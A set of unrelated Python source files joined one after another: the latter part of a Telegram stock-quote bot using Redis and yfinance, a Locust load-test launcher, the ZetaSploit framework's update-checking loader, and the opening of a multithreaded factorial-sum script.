r.sadd("auth_chats", chat_id)
def redis_check_chat_auth(self, chat_id):
return self.redis_get_db().sismember("auth_chats", chat_id)
def redis_user_watch_info_exists(self, chat_id):
r = self.redis_get_db()
return r.exists("wl_{}_info".format(chat_id))
def redis_user_watch_info_save(self, chat_id, info):
r = self.redis_get_db()
r.set("wl_{}_info".format(chat_id), json.dumps(info))
def redis_add_user_watch(self, ticker, chat_id):
r = self.redis_get_db()
r.sadd("wl_{}".format(chat_id), ticker)
def redis_del_user_watch(self, ticker, chat_id):
r = self.redis_get_db()
r.srem("wl_{}".format(chat_id), ticker)
def redis_list_user_watch(self, chat_id):
r = self.redis_get_db()
return sorted(r.smembers("wl_{}".format(chat_id)))
def redis_watch_toggle(self, chat_id):
r = self.redis_get_db()
if r.sismember("wl_enabled", chat_id):
r.srem("wl_enabled", chat_id)
return False
else:
r.sadd("wl_enabled", chat_id)
return True
def redis_watch_disable(self, chat_id):
r = self.redis_get_db()
r.srem("wl_enabled", chat_id)
def redis_list_enabled_watchlists(self):
r = self.redis_get_db()
return r.smembers("wl_enabled")
def redis_get_feargreed_cache(self):
return self.redis_get_db().get("feargreed_cache")
def redis_set_feargreed_cache(self, img_data):
r = self.redis_get_db()
r.setex("feargreed_cache", 10800, img_data) # 3 hour exp
def redis_get_quote_cache(self, ticker):
d = self.redis_get_db().get("quote_"+ticker)
return json.loads(d) if d else None
def redis_set_quote_cache(self, ticker, ticker_data):
r = self.redis_get_db()
r.setex("quote_"+ticker, 300, json.dumps(ticker_data)) # 5 min exp
def test_tg_or_die(self):
self.logger.info("Checking Telegram API token ...")
if not self.tg_getme():
self.logger.error("Telegram API token is invalid, exiting ...")
sys.exit(1)
self.logger.info("Telegram API token is valid")
def test_redis_or_die(self):
self.logger.info("Testing Redis connectivity ...")
if not self.redis_ping():
self.logger.error("Unable to connect to Redis, exiting ...")
sys.exit(1)
self.logger.info("Redis connection is ok")
def write_pidfile(self):
pidf = os.path.join(tempfile.gettempdir(), "tickergram.pid")
pid = os.getpid()
with open(pidf, "w") as f:
f.write(str(pid))
return pid
def ticker_add_emoji(self, ticker):
emoji_dict = {"SPY": u"\U0001F1FA\U0001F1F8", "QQQ": u"\U0001F4BB", "MCHI": u"\U0001F1E8\U0001F1F3",
"FEZ": u"\U0001F1EA\U0001F1FA", "BTC-USD": u"\U000020BF ", "GC=F": u"\U0001F947",
"VNQ": u"\U0001F3E0", "^TNX": u"\U0001F4B5", "^VIX": u"\U0001F3A2"}
return emoji_dict.get(ticker, "") + ticker
def ticker_chg_emoji_color(self, sign):
return u"\U0001F7E2" if sign == "+" else u"\U0001F534"
def text_quote_long(self, t, short_name, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg, ftweek_low, ftweek_low_chg,
day_low, day_high, volume, volume_avg, pe, pe_forward, div_yield):
price_chg_sign = "+" if price >= price_prevclose else "-"
ftweek_high_chg_sign = "+" if price >= ftweek_high else "-"
ftweek_low_chg_sign = "+" if price >= ftweek_low else "-"
if price_change > 1:
price_change_emoji = u"\U0001F4C9" if price_chg_sign == "-" else u"\U0001F680"
else:
price_change_emoji = ""
ftweek_high_chg_emoji = ""+(u"\U00002757"*int(ftweek_high_chg/10))
text_msg = "```\n"
text_msg += "{}\n".format(short_name)
text_msg += "{}{} {:.2f} ({}{:.2f}%{})\n".format(self.ticker_chg_emoji_color(price_chg_sign), t, price, price_chg_sign, price_change, price_change_emoji)
text_msg += "-"*len(t) + "\n"
text_msg += "Day's range {:.2f} - {:.2f}\n".format(day_low, day_high)
text_msg += "52w high {:.2f} ({}{:.2f}%{})\n".format(ftweek_high, ftweek_high_chg_sign, ftweek_high_chg, ftweek_high_chg_emoji)
text_msg += "52w low {:.2f} ({}{:.2f}%)\n".format(ftweek_low, ftweek_low_chg_sign, ftweek_low_chg)
text_msg += "Volume {}\n".format(volume)
text_msg += "Volume average {}\n".format(volume_avg)
text_msg += "PE ratio {}\n".format(pe)
text_msg += "PE ratio forward {}\n".format(pe_forward)
text_msg += "Dividend yield {}\n".format(div_yield)
text_msg += "\n```"
return text_msg
def text_quote_short(self, t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg):
price_change_sign = "+" if price >= price_prevclose else "-"
if price_change > 1:
price_change_emoji = u"\U0001F4C9" if price_change_sign == "-" else u"\U0001F680"
else:
price_change_emoji = ""
ftweek_high_chg_sign = "+" if price >= ftweek_high else "-"
ftweek_high_chg_emoji = ""+(u"\U00002757"*int(ftweek_high_chg/10))
text_msg = "{}{} {:.2f} ({}{:.2f}%{} 52w high chg {}{:.2f}%{})\n".format(self.ticker_chg_emoji_color(price_change_sign), self.ticker_add_emoji(t),
price, price_change_sign, price_change, price_change_emoji, ftweek_high_chg_sign, ftweek_high_chg, ftweek_high_chg_emoji)
return text_msg
def generic_get_quote(self, ticker):
# Easily replace the quote provider here, using the same standard
# output format used in yf_get_quote
return self.yf_get_quote(ticker)
def generic_get_news(self, ticker):
# Easily replace the data provider here, using the same standard
# output format used in yf_get_news
return self.yf_get_news(ticker)
def yf_get_quote(self, ticker):
# Get ticker cache before querying YF
quote_cache = self.redis_get_quote_cache(ticker)
if quote_cache:
return quote_cache
ret_data = {}
try:
ty = yf.Ticker(ticker)
ty_info = ty.info
except:
return None
if "shortName" not in ty_info.keys() or not ty_info.get("regularMarketPrice"):
return None
ret_data["company_name"] = ty_info["shortName"]
ret_data["latest_price"] = round(ty_info["regularMarketPrice"], 2)
ret_data["previous_close"] = round(ty_info["previousClose"], 2)
ret_data["52w_high"] = round(ty_info["fiftyTwoWeekHigh"], 2)
ret_data["52w_low"] = round(ty_info["fiftyTwoWeekLow"], 2)
ret_data["day_high"] = round(ty_info["dayHigh"], 2)
ret_data["day_low"] = round(ty_info["dayLow"], 2)
ret_data["market_volume"] = ty_info["regularMarketVolume"]
ret_data["market_volume"] = f'{ret_data["market_volume"]:n}'
ret_data["market_volume_avg"] = ty_info["averageVolume"]
ret_data["market_volume_avg"] = f'{ret_data["market_volume_avg"]:n}'
pe = ty_info.get("trailingPE", None)
pe = "{:.2f}".format(round(pe, 2)) if pe else "N/A"
ret_data["pe_trailing"] = pe
pe_forward = ty_info.get("forwardPE", None)
pe_forward = "{:.2f}".format(round(pe_forward, 2)) if pe_forward else "N/A"
ret_data["pe_forward"] = pe_forward
div_yield = ty_info.get("dividendYield", None)
div_yield = "{:.2f}%".format(round(div_yield*100, 2)) if div_yield else "N/A"
ret_data["div_yield"] = div_yield
self.redis_set_quote_cache(ticker, ret_data)
return ret_data
def yf_get_stock_chart(self, ticker, time_range="1Y", interval="1D"):
# Make YF range and interval formats compatible
time_range = time_range.replace("M", "MO")
interval = interval.replace("W", "WK")
interval = interval.replace("M", "MO")
output_file = "{}.png".format(str(uuid.uuid4()))
try:
t = yf.Ticker(ticker)
hist = t.history(period=time_range, interval=interval)
mpf.plot(hist, type="candle", volume=True, style="mike", datetime_format='%b %Y',
figratio=(20,10), tight_layout=True,
title="\n{} {}".format(ticker, time_range),
savefig=dict(fname=output_file, dpi=95))
except:
pass
return output_file
def yf_get_news(self, ticker):
try:
ty = yf.Ticker(ticker)
ty_news = ty.news
except:
return None
ret_data = []
if ty_news:
for n in ty_news:
ret_data.append({"title": n["title"], "link": n["link"], "time":
datetime.datetime.fromtimestamp(n["providerPublishTime"])})
return ret_data
def cnn_get_fear_greed(self):
output_file = "{}.png".format(str(uuid.uuid4()))
cache_pic = self.redis_get_feargreed_cache()
if cache_pic:
with open(output_file, "wb") as f:
f.write(cache_pic)
else:
self.ff_screenshot("https://money.cnn.com/data/fear-and-greed/", "660,470", output_file)
if os.path.exists(output_file):
with open(output_file, "rb") as f:
self.redis_set_feargreed_cache(f.read())
return output_file
def ff_screenshot(self, url, ws, output):
profile = str(uuid.uuid4())
profile_path = os.path.join(tempfile.gettempdir(), profile)
os.mkdir(profile_path)
try:
subprocess.run(["firefox", "--headless", "--kiosk", "--profile", profile_path,
"--window-size={}".format(ws), "--screenshot", output, url], timeout=300)
shutil.rmtree(profile_path)
except:
pass
def get_change(self, current, previous):
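        # Absolute percentage change between current and previous (the sign is reconstructed by the
        # callers); returns inf when previous is 0.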
if current == previous:
return 0
try:
return round((abs(current - previous) / previous) * 100.0, 2)
except ZeroDivisionError:
return float("inf")
def adjust_chart_interval(self, dt_time_range):
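        # Pick a candle interval that keeps the chart readable for the requested range:
        # hourly up to 1 day, daily up to 1 month, weekly up to 1 year, monthly beyond that.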
if dt_time_range <= datetime.timedelta(days=1):
return "1H"
elif dt_time_range <= datetime.timedelta(days=30):
return "1D"
elif dt_time_range <= datetime.timedelta(days=365):
return "1W"
else:
return "1M"
def valid_ticker(self, ticker):
return True if len(ticker) <= 8 and re.fullmatch(r"^[A-Za-z0-9\.\^\-]{1,8}$", ticker) else False
def bot_watchlist_notify(self, chat_id=None):
if chat_id:
# Craft a fake watchlist list for this chat
watchlists = [str(chat_id)]
else:
# This function was called from notify_watchers()
self.test_tg_or_die()
self.test_redis_or_die()
watchlists = self.redis_list_enabled_watchlists()
for chat_id in watchlists:
chat_id = chat_id.decode() if type(chat_id) is not str else chat_id
if not self.tg_chat_exists(int(chat_id)):
# Chat doesn't exist anymore, disable automatic notifications for this watchlist
self.redis_watch_disable(chat_id)
continue
wl_tickers = self.redis_list_user_watch(chat_id)
if not wl_tickers:
continue
text_msg = "```\n"
for t in wl_tickers:
t = t.decode()
ticker_info = self.generic_get_quote(t)
if not ticker_info:
continue
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
# Compose message text
text_msg += self.text_quote_short(t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg)
text_msg += "```"
if not self.tg_send_msg_post(text_msg, chat_id):
# Error delivering message, disable automatic notifications for this watchlist
self.redis_watch_disable(chat_id)
def bot_auth_chat(self, chat):
return self.redis_check_chat_auth(chat["id"])
def bot_antiflood_check(self, msg_from, msg_time):
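        # Drop expired entries from the per-user cache and report whether this sender already issued
        # a command within the last ANTI_FLOOD_SECS seconds; the current message time is recorded
        # either way.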
for u in list(self.antiflood_cache.keys()):
if self.antiflood_cache[u] + self.ANTI_FLOOD_SECS < msg_time:
del self.antiflood_cache[u]
hit_antiflood = msg_from["id"] in self.antiflood_cache.keys()
self.antiflood_cache[msg_from["id"]] = msg_time
return hit_antiflood
def bot_cmd_help(self, chat, text, msg_from):
text_msg = "/help show this help message\n"
if self.BOT_ENABLED_PASS:
text_msg += "/auth *\<password\>* authorize chat to use this bot if password is correct\n"
text_msg += "/quote *\<ticker\>* get quote\n"
text_msg += "/chart *\<ticker\> \[1y,6m,5d\]* get price and volume chart\n"
text_msg += "/news *\<ticker\>* get the latest news related to the ticker\n"
text_msg += "/watch *list\|add\|del* *\[ticker\]* list, add or remove ticker from your watchlist\n"
text_msg += "/watchlist get an overview of your watchlist\n"
text_msg += "/watchlistnotify toggle the automatic watchlist notifications on and off\n"
text_msg += "/overview get an overview of global markets\n"
text_msg += "/feargreed get picture of CNN's Fear & Greed Index\n"
text_msg += "/screener print screener results\n"
#text_msg += u"_Powered by [Tickergram](https://github.com/a0rtega/tickergram-bot)_"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_auth(self, chat, text, msg_from):
auth_pwd = text.replace("/auth ", "")
if auth_pwd == self.BOT_PASSWORD:
self.redis_add_chat_auth(chat["id"])
text_msg = "```\nChat access granted, welcome {}\n```".format(msg_from["first_name"])
else:
text_msg = "```\nInvalid password\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_quote(self, chat, text, msg_from):
ticker = text.replace("/quote ", "").upper()
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_info = self.generic_get_quote(ticker)
if ticker_info:
short_name = ticker_info["company_name"]
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
ftweek_low = ticker_info["52w_low"]
day_high = ticker_info["day_high"]
day_low = ticker_info["day_low"]
volume = ticker_info["market_volume"]
volume_avg = ticker_info["market_volume_avg"]
pe = ticker_info["pe_trailing"]
pe_forward = ticker_info["pe_forward"]
div_yield = ticker_info["div_yield"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
ftweek_low_chg = self.get_change(price, ftweek_low)
# Compose message text
text_msg = self.text_quote_long(ticker, short_name, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg, ftweek_low, ftweek_low_chg,
day_low, day_high, volume, volume_avg, pe, pe_forward, div_yield)
else:
text_msg = "```\nError getting ticker info\n```"
else:
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_news(self, chat, text, msg_from):
ticker = text.replace("/news ", "").upper()
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_news = self.generic_get_news(ticker)
if ticker_news:
text_msg = ""
for n in ticker_news:
text_msg += u"\U00002022 *{}*: `{}` \([link]({})\)\n".format(n["time"].strftime("%Y\-%m\-%d"),
n["title"], n["link"])
text_msg = text_msg[:-1] # remove last newline
else:
text_msg = "```\nError getting ticker news\n```"
else:
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_watch(self, chat, text, msg_from):
cmd = text.replace("/watch ", "").split(" ")
if cmd[0] == "list":
watchlist = self.redis_list_user_watch(chat["id"])
watchlist = ", ".join([w.decode() for w in watchlist]) if watchlist else "empty"
text_msg = "```\nYour watchlist is {}\n```".format(watchlist)
elif cmd[0] == "add" and len(cmd) == 2:
ticker = cmd[1].upper()
if len(self.redis_list_user_watch(chat["id"])) <= 50:
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_info = self.generic_get_quote(ticker)
if ticker_info:
if not self.redis_user_watch_info_exists(chat["id"]):
self.redis_user_watch_info_save(chat["id"], {"chat":chat, "msg_from":msg_from})
self.redis_add_user_watch(ticker, chat["id"])
text_msg = "```\n{} added to your watchlist\n```".format(ticker)
else:
text_msg = "```\nError getting ticker info\n```"
else:
text_msg = "```\nInvalid ticker\n```"
else:
text_msg = "```\nWatchlist maximum limit hit\n```"
elif cmd[0] == "del" and len(cmd) == 2:
ticker = cmd[1].upper()
if self.valid_ticker(ticker):
self.redis_del_user_watch(ticker, chat["id"])
text_msg = "```\n{} removed from your watchlist\n```".format(ticker)
else:
text_msg = "```\nInvalid ticker\n```"
else:
text_msg = "```\nInvalid watch command\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_watchlist(self, chat, text, msg_from):
self.tg_start_action(chat["id"])
if not self.redis_list_user_watch(chat["id"]):
text_msg = "```\nYour watchlist is empty\n```"
self.tg_send_msg_post(text_msg, chat["id"])
else:
self.bot_watchlist_notify(chat["id"])
def bot_cmd_watchlistnotify(self, chat, text, msg_from):
status = self.redis_watch_toggle(chat["id"])
status = "enabled" if status else "disabled"
text_msg = "```\nWatchlist notifications are now {}\n```".format(status)
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_chart(self, chat, text, msg_from):
request = text.replace("/chart ", "").split(" ")
ticker = request[0].upper()
if len(request) > 1:
time_range = request[1].upper()
else:
time_range = "1Y"
if not self.valid_ticker(ticker):
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
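# The time range is one to three digits followed by Y, M or D (e.g. "6M");
# years are approximated as 365 days and months as 30 days below.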
if not re.fullmatch(r"^\d{1,3}(Y|M|D)$", time_range):
text_msg = "```\nInvalid time range\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
time_range_int = int(time_range[:-1])
if time_range.endswith("Y"):
chart_td = datetime.timedelta(days=time_range_int*365)
elif time_range.endswith("M"):
chart_td = datetime.timedelta(days=time_range_int*30)
else:
chart_td = datetime.timedelta(days=time_range_int)
if (self.MAX_CHART_RANGE - chart_td) < datetime.timedelta(0):
text_msg = "```\nChart time range exceeds the limit\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
interval = self.adjust_chart_interval(chart_td)
self.tg_start_action(chat["id"], "upload_photo")
output_pic = self.yf_get_stock_chart(ticker, time_range, interval)
if os.path.exists(output_pic):
self.tg_send_pic(output_pic, chat["id"])
os.remove(output_pic)
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_overview(self, chat, text, msg_from):
global_tickers = ["#Stocks ETFs", "SPY", "QQQ",
"FEZ", "MCHI", "VNQ", "#VIX", "^VIX",
"#10Y Bonds", "^TNX",
"#Currency", "RUB=X",
"#Gold", "GC=F",
"#Crypto", "BTC-USD"]
self.tg_start_action(chat["id"])
try:
text_msg = "```\n"
for t in global_tickers:
if t.startswith("#"): # Parse sections
if len(t) > 1:
text_msg += "----- {}\n".format(t[1:])
else:
text_msg += "-----\n"
continue
ticker_info = self.generic_get_quote(t)
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
# Compose message text
text_msg += self.text_quote_short(t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg)
text_msg += "```"
except Exception as e:
self.logger.error(str(e))
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_feargreed(self, chat, text, msg_from):
self.tg_start_action(chat["id"], "upload_photo")
output_pic = self.cnn_get_fear_greed()
if os.path.exists(output_pic):
self.tg_send_pic(output_pic, chat["id"])
os.remove(output_pic)
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_screener(self, chat, text, msg_from):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
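# The screener is scraped from three finviz result views and merged on the
# Ticker column; the view numbers requested below select different column sets.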
def get_screener(version):
screen = requests.get(f'https://finviz.com/screener.ashx?v={version}&f=an_recom_holdbetter,cap_midover,fa_eps5years_pos,fa_grossmargin_pos,fa_netmargin_pos,fa_opermargin_pos,fa_sales5years_pos,geo_usa,ta_rsi_os30&ft=4&o=-marketcap&r=1', headers = headers).text
tables = pd.read_html(screen)
tables = tables[-2]
tables.columns = tables.iloc[0]
tables = tables[1:]
return tables
tables111 = get_screener('111')
tables161 = get_screener('161')
tables121 = get_screener('121')
consolidatedtables = pd.merge(tables111,tables161,how='outer',left_on='Ticker',right_on='Ticker')
consolidatedtables = pd.merge(consolidatedtables,tables121,how='outer',left_on='Ticker',right_on='Ticker')
consolidatedtables.to_csv('test.csv')
csv_file = pd.read_csv('test.csv', usecols = ['Ticker','P/E_x'])
if not csv_file.empty:
text_msg = "```\nScreener results\n"
# Iterating a DataFrame directly yields column names, so iterate over rows instead
for _, row in csv_file.iterrows():
text_msg += "{} {}\n".format(row['Ticker'], row['P/E_x'])
text_msg += "```"
self.tg_send_msg_post(text_msg, chat["id"])
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_handler(self, fnc, chat, text, msg_from):
p = multiprocessing.Process(target=fnc, args=(chat, text, msg_from))
p.daemon = True
p.start()
def bot_loop(self):
self.test_tg_or_die()
self.test_redis_or_die()
# Disable pidfile creation to allow multiple bot instances
#self.logger.info("Bot is running with pid {}".format(self.write_pidfile()))
last_update_id = 0
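# Telegram getUpdates long polling: passing offset = last processed update_id + 1
# acknowledges earlier updates so they are not returned again on the next poll.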
while True:
try:
msgs = self.tg_get_messages(offset=last_update_id)
except Exception:
self.logger.error("Unable to query Telegram Bot API")
time.sleep(30)
continue
for m in msgs["result"]:
try:
update_id = m["update_id"]
# Support for telegram edited messages
if "edited_message" in m.keys():
msg_key = "edited_message"
else:
msg_key = "message"
chat = m[msg_key]["chat"]
text = m[msg_key]["text"]
msg_from = m[msg_key]["from"]
except Exception:
self.logger.error("Error parsing update: {}".format(m))
# update_id may not have been parsed yet, so fall back to the raw field
last_update_id = m.get("update_id", last_update_id) + 1
continue
self.logger.debug("{} {} {}".format(msg_from, chat, text))
hit_antiflood = self.bot_antiflood_check(msg_from, time.time())
if hit_antiflood:
self.logger.warning("User hit antiflood protection")
# Increase update id
last_update_id = update_id + 1
continue
# Check chat authorization if enabled
chat_auth = True
if self.BOT_ENABLED_PASS:
chat_auth = self.bot_auth_chat(chat)
if not chat_auth:
self.logger.warning("Message from unauthorized chat: {} {}".format(msg_from, text))
# Remove explicit bot mention if found
# (telegram bot accounts always end with "bot")
text = re.sub(r"@[\w\.\-]+bot", "", text, flags=re.IGNORECASE)
# Allow command if it's explicitly allowed (--allow)
if text.split(" ")[0] in self.ALLOW_COMMANDS:
chat_auth = True
# Handle commands
if text in ("/help", "/start"):
self.bot_cmd_help(chat, text, msg_from)
elif self.BOT_ENABLED_PASS and text.startswith("/auth "):
self.bot_cmd_auth(chat, text, msg_from)
else: # Authorized-only commands
if not chat_auth and text.split(" ")[0] in ("/quote", "/chart", "/news",
"/watch", "/watchlist", "/watchlistnotify",
"/overview", "/feargreed", "/screener"):
text_msg = "```\nUnauthorized\n```"
if self.ALLOW_COMMANDS:
text_msg += "Commands allowed without authentication: {}\n".format(
" ".join(self.ALLOW_COMMANDS))
text_msg += "Type /help for more information"
self.tg_send_msg_post(text_msg, chat["id"])
elif chat_auth and text.startswith("/quote "):
self.bot_cmd_handler(self.bot_cmd_quote, chat, text, msg_from)
elif chat_auth and text.startswith("/chart "):
self.bot_cmd_handler(self.bot_cmd_chart, chat, text, msg_from)
elif chat_auth and text.startswith("/news "):
self.bot_cmd_handler(self.bot_cmd_news, chat, text, msg_from)
elif chat_auth and text.startswith("/watch "):
self.bot_cmd_handler(self.bot_cmd_watch, chat, text, msg_from)
elif chat_auth and text == "/watchlist":
self.bot_cmd_handler(self.bot_cmd_watchlist, chat, text, msg_from)
elif chat_auth and text == "/watchlistnotify":
self.bot_cmd_handler(self.bot_cmd_watchlistnotify, chat, text, msg_from)
elif chat_auth and text == "/overview":
self.bot_cmd_handler(self.bot_cmd_overview, chat, text, msg_from)
elif chat_auth and text == "/feargreed":
self.bot_cmd_handler(self.bot_cmd_feargreed, chat, text, msg_from)
elif chat_auth and text == "/screener":
self.bot_cmd_handler(self.bot_cmd_screener, chat, text, msg_from)
# Increase update id
last_update_id = update_id + 1
def main():
parser = argparse.ArgumentParser(description="Tickergram bot")
parser.add_argument("token", help="Telegram Bot API token", nargs=1)
parser.add_argument("-p", "--password", default="", help="Set a password required to interact with the bot (enables the /auth command)")
parser.add_argument("-a", "--allow", default="", help="Allow certain commands without requiring the password, comma-separated list (example: /quote,/chart)",
type=lambda s: [i for i in s.split(",")] if s else [])
parser.add_argument("-r", "--redis", default="localhost", help="redis host to use")
parser.add_argument("-l", "--port", type=int, default=6379, help="redis port to use")
parser.add_argument("-d", "--db", type=int, default=0, help="redis database to use")
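# Example invocation (script name and token are placeholders):
#   python3 bot.py <TELEGRAM_TOKEN> -p secret -a /quote,/chart -r localhost -l 6379 -d 0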
args = parser.parse_args()
b = tickergram(args.token[0], redis_host=args.redis, redis_port=args.port, redis_db=args.db, password=args.password, allow_commands=args.allow)
b.bot_loop()
def notify_watchers():
parser = argparse.ArgumentParser(description="Tickergram bot notifications. Sends a message with the current status of the watchlist to the chats with enabled notifications.")
parser.add_argument("token", help="Telegram Bot API token", nargs=1)
parser.add_argument("-r", "--redis", default="localhost", help="redis host to use")
parser.add_argument("-l", "--port", type=int, default=6379, help="redis port to use")
parser.add_argument("-d", "--db", type=int, default=0, help="redis database to use")
args = parser.parse_args()
b = tickergram(args.token[0], redis_host=args.redis, redis_port=args.port, redis_db=args.db)
b.bot_watchlist_notify()
if __name__ == "__main__":
main()
|
locust.py
|
import gevent.monkey
gevent.monkey.patch_all()
import sys
import time
import multiprocessing
import socket
# import gevent
from locust import runners
# from locust import events, web
from locust import events
from locust.main import version, load_locustfile
from locust.stats import print_percentile_stats, print_error_report, print_stats
from slocust.base import master_options, slave_options
from slocust.logger import logger
def parse_locustfile(locustfile):
docstring, locusts = load_locustfile(locustfile)
locust_classes = list(locusts.values())
return locust_classes
def start_master(locust_classes, slaves_num):
# web
# logger.info("Starting web monitor at {}:{}".format(
# master_options.web_host or "*", master_options.port))
# master_greenlet = gevent.spawn(web.start, locust_classes, master_options)
# no_web
# todo: run time
runners.locust_runner = runners.MasterLocustRunner(locust_classes, master_options)
while len(runners.locust_runner.clients.ready) < slaves_num:
logger.info("Waiting for slaves to be ready, %s of %s connected",
len(runners.locust_runner.clients.ready), slaves_num)
time.sleep(1)
logger.info("%s slaves connected, starting hatching",
len(runners.locust_runner.clients.ready))
runners.locust_runner.start_hatching(master_options.num_clients, master_options.hatch_rate)
master_greenlet = runners.locust_runner.greenlet
try:
master_greenlet.join()
except KeyboardInterrupt:
events.quitting.fire()
print_stats(runners.locust_runner.request_stats)
print_percentile_stats(runners.locust_runner.request_stats)
print_error_report()
sys.exit(0)
def start_slave(locust_classes):
runners.locust_runner = runners.SlaveLocustRunner(locust_classes, slave_options)
slave_greenlet = runners.locust_runner.greenlet
try:
slave_greenlet.join()
except socket.error as ex:
logger.error("Failed to connect to the Locust master: %s", ex)
sys.exit(-1)
except KeyboardInterrupt:
events.quitting.fire()
sys.exit(0)
class LocustStarter(object):
def __init__(self, api_host, master_host, port, num_clients, hatch_rate,
slave_only=False):
logger.info("Starting Locust %s" % version)
master_options.host = api_host
master_options.port = port
master_options.num_clients = num_clients
master_options.hatch_rate = hatch_rate
slave_options.master_host = master_host
self.slave_only = slave_only
def start(self, locustfile, slaves_num):
locust_classes = parse_locustfile(locustfile)
slaves_num = slaves_num or multiprocessing.cpu_count()
logger.info("Starting %s slaves" % slaves_num)
processes = []
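# Spawn one slave runner per process (defaulting to one per CPU core above);
# the processes are daemonized so they exit together with the parent.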
for _ in range(slaves_num):
p_slave = multiprocessing.Process(target=start_slave, args=(locust_classes,))
p_slave.daemon = True
p_slave.start()
processes.append(p_slave)
try:
if self.slave_only:
for process in processes: process.join()
else:
start_master(locust_classes, slaves_num)
except KeyboardInterrupt:
sys.exit(0)
|
loader.py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import sys
import time
import threading
import os
import string
import requests
from core.badges import badges
from core.importer import importer
from core.config import config
class loader:
def __init__(self):
self.badges = badges()
self.importer = importer()
self.config = config()
def load_update_process(self):
remote_config = requests.get('https://raw.githubusercontent.com/EntySec/ZetaSploit/main/config/core_config.yml', stream=True)
remote_config = remote_config.content
if self.config.get_config_file(remote_config)['details']['version'] != self.config.core_config['details']['version']:
self.badges.output_warning("Your ZetaSploit Framework is outdated.")
self.badges.output_information("Consider running ./update.sh")
time.sleep(1)
def load_components(self):
self.importer.import_all()
def load_everything(self):
self.load_update_process()
self.load_components()
def load_all(self):
loading_process = threading.Thread(target=self.load_everything)
loading_process.start()
base_line = "Loading the ZetaSploit Framework..."
cycle = 0
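# Simple console spinner: cycle through the /-\| frames while toggling the case
# of one character of the base message on each tick, until loading completes.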
while loading_process.is_alive():
for char in "/-\\|":
status = base_line + char + "\r"
cycle += 1
if status[cycle % len(status)] in list(string.ascii_lowercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].upper() + status[cycle % len(status) + 1:]
elif status[cycle % len(status)] in list(string.ascii_uppercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].lower() + status[cycle % len(status) + 1:]
sys.stdout.write(self.badges.P + status)
time.sleep(.1)
sys.stdout.flush()
loading_process.join()
|
multithread.py
|
# Multi-threaded (subject to GIL) sum of factorials
import math
import threading
INPUT_FILE_COUNT = 10
INPUT_FILE_DIR = 'data/'
INTERMEDIATE_RESULTS_PATH = 'results/thread'
REDUCED_OUTPUT_FILE = 'results/multithread.txt'
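# Note: CPython's GIL keeps these threads from computing factorials in parallel;
# the structure is a map (one thread per input file writing an intermediate
# result) followed by a single-threaded reduce over the intermediate files.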
def main():
# Create and launch threads
threads = []
for i in range(INPUT_FILE_COUNT):
threads.append(threading.Thread(target=read_and_process, args=(i,)))
for t in threads:
t.start()
# Wait for all threads to complete execution
for t in threads:
t.join()
print('OK all threads are done')
# Reduce results of each thread into final answer
total = 0
for i in range(INPUT_FILE_COUNT):
file_name = '%s%s.txt' % (INTERMEDIATE_RESULTS_PATH, i)
print('Reading intermediate results file %s' % file_name)
with open(file_name, 'r') as infile:
for l in infile:
total += int(l)
# Write reduced output file
with open(REDUCED_OUTPUT_FILE, 'w') as outfile:
outfile.write('%s\n' % total)
print('Done')
def read_and_process(n):
